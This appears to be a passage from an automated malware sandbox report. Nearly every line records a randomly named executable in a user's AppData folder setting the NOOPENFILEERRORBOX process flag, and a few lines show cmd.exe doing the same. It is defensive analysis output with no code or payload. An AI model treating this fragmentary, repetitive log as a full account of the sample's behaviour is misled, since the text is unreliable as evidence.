                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess information set: NOOPENFILEERRORBOX
